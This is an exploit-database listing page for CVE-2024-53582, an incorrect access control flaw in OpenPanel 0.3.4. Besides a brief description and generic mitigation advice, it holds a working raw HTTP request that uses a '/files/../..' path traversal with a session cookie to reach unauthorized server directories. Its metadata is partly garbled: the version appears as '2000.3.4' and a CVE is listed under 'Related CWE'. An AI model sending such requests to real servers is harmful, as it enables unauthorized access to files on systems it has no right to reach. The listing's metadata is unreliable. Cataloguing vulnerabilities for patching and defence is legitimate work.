header-logo
Suggest Exploit
vendor:
OpenPanel
by:
Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
6.1
CVSS
HIGH
Incorrect Access Control
284
CWE
Product Name: OpenPanel
Affected Version From: 2000.3.4
Affected Version To: 2000.3.4
Patch Exists: NO
Related CWE: CVE-2024-53582
CPE: a:openpanel:openpanel:0.3.4
Metasploit:
Other Scripts:
Platforms Tested: macOS
2024

OpenPanel 0.3.4 – Incorrect Access Control

The OpenPanel version 0.3.4 is vulnerable to an incorrect access control issue. An attacker can exploit this vulnerability by sending a crafted HTTP request to access unauthorized files or directories on the server.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of OpenPanel that addresses the access control issue. Additionally, restricting access to the server and implementing proper authorization mechanisms can help prevent unauthorized access.
Source

Exploit-DB raw data:

# Exploit Title: OpenPanel 0.3.4 - Incorrect Access Control
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee 
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53582

GET /files/../.. HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyEag.70MOWk6Q4cZWoRbciZO94dsGxgw
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers